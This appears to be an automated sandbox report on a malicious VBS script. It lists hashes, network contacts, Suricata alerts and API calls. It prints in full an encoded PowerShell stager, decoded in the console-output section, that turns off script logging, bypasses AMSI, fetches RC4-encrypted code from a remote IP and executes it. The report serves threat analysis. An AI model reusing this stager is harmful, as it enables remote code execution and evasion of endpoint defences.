Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 12, 2024, 11:19 a.m.	Aug. 12, 2024, 11:21 a.m.

Size	5.2KB
Type	ASCII text, with very long lines
MD5	`11b63c6b0c147878948fa98e39974061`
SHA256	`60f1cde0dc78dd2acf9673dfc4f632dc6cd90f3c4fa412f44b1d8696d6518ed5`
CRC32	`9F2B2DF7`
ssdeep	`96:zG5rFpE2Q7qlJv4xfdn4iGyMsG5CRD1Su8o3eX+Gi+vYBnKip+JuBTH4JQHy3ybA:zGAjECv4iF+5C1j8GEi4knKip+Jg7Hah`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Organiser.vbs
2548
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAcwBJAG8AbgBUAGEAQgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABCAGUAMgBFADMAPQBbAHIARQBGAF0ALgBBAFMAUwBlAE0AQgBsAFkALgBHAEUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAFQARgBpAGUAYABMAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkAZgAoACQAQgBFADIARQAzACkAewAkADgARgBBADEAYgA9ACQAYgBlADIARQAzAC4ARwBlAHQAVgBhAEwAdQBFACgAJABuAHUATABsACkAOwBJAGYAKAAkADgAZgBhADEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADgARgBhADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA4AGYAYQAxAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEAbAA9AFsAQwBPAEwATABFAGMAVABpAG8ATgBTAC4ARwBFAE4AZQBSAGkAQwAuAEQAaQBDAFQAaQBvAG4AQQByAHkAWwBTAHQAcgBJAG4AZwAsAFMAWQBTAHQARQBNAC4ATwBCAGoARQBjAHQAXQBdADoAOgBuAEUAdwAoACkAOwAkAFYAYQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAYQBsAC4AQQBkAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBiAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAQQBMAH0ARQBMAFMARQB7AFsAUwBDAFIAaQBwAFQAQgBsAG8AQwBLAF0ALgAiAEcARQB0AEYAaQBlAGAATABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAGEATABVAEUAKAAkAG4AdQBsAEwALAAoAE4AZQBXAC0ATwBCAEoARQBDAFQAIABDAG8ATABMAEUAQwBUAEkAbwBOAFMALgBHAEUATgBlAHIASQBDAC4ASABhAFMAaABTAEUAdABbAFMAVABSAEkAbgBnAF0AKQApAH0AJABSAEUAZgA9AFsAUgBFAEYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcARQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBGAC4ARwBlAHQARgBJAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbABVAGUAKAAkAE4AdQBsAGwALAAkAFQAcgBVAEUAKQA7AH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgB2AEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAeABwAGUAYwB0ADEAMAAwAEMATwBuAHQASQBOAHUARQA9ADAAOwAkADEAYQA5ADMAMAA9AFsAUwBZAHMAdABlAG0ALgBUAGUAWAB0AC4ARQBuAGMATwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJAAxAEEAOQAzADAAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkADEAQQA5ADMAMABbACQAXwAlACQAMQBBADkAMwAwAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAFgAVAAuAEUAbgBDAE8ARABpAE4AZwBdADoAOgBVAG4AaQBDAG8ARABlAC4ARwBFAHQAUwBUAFIAaQBuAEcAKABbAEMAbwBOAHYARQByAHQAXQA6ADoARgBSAE8AbQBCAEEAUwBlADYANABTAHQAUgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBOAFAAMwA3AFoAUQBvADAAZgBTAFEAagBMAHkAQgBjAHUAVABmAE8AMAAxADEAdwB1ADYANAA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABkAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABBAD0AJABkAGEAdABhAFsANAAuAC4AJABEAGEAVABBAC4AbABlAE4ARwB0AGgAXQA7AC0AagBvAEkAbgBbAEMAaABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQAMQBhADkAMwAwACkAKQAgAHwAIABJAEUAWAA=
  2628

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
117.18.232.200	Active	Moloch
164.124.101.2	Active	Moloch
89.197.154.116	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 117.18.232.200:443 -> 192.168.56.101:49173	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49169 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49170 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49168 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49171 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 117.18.232.200:443 -> 192.168.56.101:49172	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 12, 2024, 11:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 11:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 11:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 11:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 12, 2024, 11:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 11:19 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 11:19 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 12, 2024, 11:19 a.m.			0	0

Command line console output was observed (50 out of 60 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: Cannot index into a null array. console_handle: 0x00000023	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: At line:1 char:1873 console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: + If($PSVeRsIonTaBLe.PSVeRsioN.MajoR -gE 3){$Be2E3=[rEF].ASSeMBlY.GETTYpE('Syst console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: em.Management.Automation.Utils')."GETFie`Ld"('cachedGroupPolicySettings','N'+'o console_handle: 0x00000047	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: nPublic,Static');If($BE2E3){$8FA1b=$be2E3.GetVaLuE($nuLl);If($8fa1B['ScriptB'+' console_handle: 0x00000053	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: lockLogging']){$8Fa1b['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0 console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: ;$8fa1b['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$Val=[ console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: COLLEcTioNS.GENeRiC.DiCTionAry[StrIng,SYStEM.OBjEct]]::nEw();$VaL.Add('EnableSc console_handle: 0x00000077	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: riptB'+'lockLogging',0);$Val.AdD('EnableScriptBlockInvocationLogging',0);$8fa1b console_handle: 0x00000083	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: ['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'l console_handle: 0x0000008f	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: ockLogging']=$VAL}ELSE{[SCRipTBloCK]."GEtFie`LD"('signatures','N'+'onPublic,Sta console_handle: 0x0000009b	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: tic').SeTVaLUE($nulL,(NeW-OBJECT CoLLECTIoNS.GENerIC.HaShSEt[STRIng]))}$REf=[RE console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: F].AsseMBLy.GEtTYpe('System.Management.Automation.Amsi'+'Utils');$REF.GetFIELD( console_handle: 0x000000b3	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: 'amsiInitF'+'ailed','NonPublic,Static').SETValUe($Null,$TrUE);};[SysTem.NeT.SEr console_handle: 0x000000bf	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: vIcEPOinTMAnAGEr]::Expect100COntINuE=0;$1a930=[SYstem.TeXt.EncOding]::ASCII.GeT console_handle: 0x000000cb	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: BYteS('d4,0gk@[P*!/fsta:b7QBhlUDr6xE]3_');$R={$D,$1A930=$ARgs;$S=0..255;0..255\| console_handle: 0x000000d7	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: %{$J=($J+$S[$_]+$1A930[$_%$1A930.CouNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D\|%{ console_handle: 0x000000e3	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: $I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BxOR$S[($S[$I]+ console_handle: 0x000000ef	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: $S[$H])%256]}};$ie=New-Object -COM InternetExplorer.Application;$ie.Silent=$Tru console_handle: 0x000000fb	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: e;$ie.visible=$False;$fl=14;$ser=$([TeXT.EnCODiNg]::UniCoDe.GEtSTRinG([CoNvErt] console_handle: 0x00000107	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: ::FROmBASe64StRing('aAB0AHQAcAA6AC8ALwA4ADkALgAxADkANwAuADEANQA0AC4AMQAxADYAOgA console_handle: 0x00000113	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: 3ADgAMQAwAA==')));$t='/news.php';$c="CF-RAY: b'NP37ZQo0fSQjLyBcuTfO011wu64='";$ console_handle: 0x0000011f	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: ie.navigate2($ser+$t,$fl,0,$Null,$c);while($ie.busy){Start-Sleep -Milliseconds console_handle: 0x0000012b	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: 100};$ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.Bindi console_handle: 0x00000137	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: ngFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml;try {$data=[System console_handle: 0x00000143	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: .Convert]::FromBase64String($ht)} catch {$Null}$Iv=$dAtA[ <<<< 0..3];$daTA=$dat console_handle: 0x0000014f	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: a[4..$DaTA.leNGth];-joIn[ChAr[]](& $R $daTA ($IV+$1a930)) \| IEX console_handle: 0x0000015b	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: + CategoryInfo : InvalidOperation: (System.Object[]:Object[]) [], console_handle: 0x00000167	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: RuntimeException console_handle: 0x00000173	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: + FullyQualifiedErrorId : NullArray console_handle: 0x0000017f	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: Cannot index into a null array. console_handle: 0x0000019f	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: At line:1 char:1891 console_handle: 0x000001ab	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: + If($PSVeRsIonTaBLe.PSVeRsioN.MajoR -gE 3){$Be2E3=[rEF].ASSeMBlY.GETTYpE('Syst console_handle: 0x000001b7	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: em.Management.Automation.Utils')."GETFie`Ld"('cachedGroupPolicySettings','N'+'o console_handle: 0x000001c3	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: nPublic,Static');If($BE2E3){$8FA1b=$be2E3.GetVaLuE($nuLl);If($8fa1B['ScriptB'+' console_handle: 0x000001cf	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: lockLogging']){$8Fa1b['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0 console_handle: 0x000001db	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: ;$8fa1b['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$Val=[ console_handle: 0x000001e7	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: COLLEcTioNS.GENeRiC.DiCTionAry[StrIng,SYStEM.OBjEct]]::nEw();$VaL.Add('EnableSc console_handle: 0x000001f3	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: riptB'+'lockLogging',0);$Val.AdD('EnableScriptBlockInvocationLogging',0);$8fa1b console_handle: 0x000001ff	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: ['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'l console_handle: 0x0000020b	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: ockLogging']=$VAL}ELSE{[SCRipTBloCK]."GEtFie`LD"('signatures','N'+'onPublic,Sta console_handle: 0x00000217	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: tic').SeTVaLUE($nulL,(NeW-OBJECT CoLLECTIoNS.GENerIC.HaShSEt[STRIng]))}$REf=[RE console_handle: 0x00000223	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: F].AsseMBLy.GEtTYpe('System.Management.Automation.Amsi'+'Utils');$REF.GetFIELD( console_handle: 0x0000022f	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: 'amsiInitF'+'ailed','NonPublic,Static').SETValUe($Null,$TrUE);};[SysTem.NeT.SEr console_handle: 0x0000023b	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: vIcEPOinTMAnAGEr]::Expect100COntINuE=0;$1a930=[SYstem.TeXt.EncOding]::ASCII.GeT console_handle: 0x00000247	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: BYteS('d4,0gk@[P*!/fsta:b7QBhlUDr6xE]3_');$R={$D,$1A930=$ARgs;$S=0..255;0..255\| console_handle: 0x00000253	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: %{$J=($J+$S[$_]+$1A930[$_%$1A930.CouNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D\|%{ console_handle: 0x0000025f	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: $I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BxOR$S[($S[$I]+ console_handle: 0x0000026b	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: $S[$H])%256]}};$ie=New-Object -COM InternetExplorer.Application;$ie.Silent=$Tru console_handle: 0x00000277	1	1
WriteConsoleW Aug. 12, 2024, 11:19 a.m.	buffer: e;$ie.visible=$False;$fl=14;$ser=$([TeXT.EnCODiNg]::UniCoDe.GEtSTRinG([CoNvErt] console_handle: 0x00000283	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b738 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053bcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053bcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053bcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053beb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053beb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053beb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053beb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053beb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053beb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b6f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b6f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b6f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053bcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053bcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053bcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053b2f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053bcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053bcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053bcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053bcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053bcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053bcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053bcb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053c038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053c038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053c038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053c038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053c038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053c038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053c038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053c038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053c038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053c038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053c038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053c038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053c038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053c038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053bf78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053bf78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
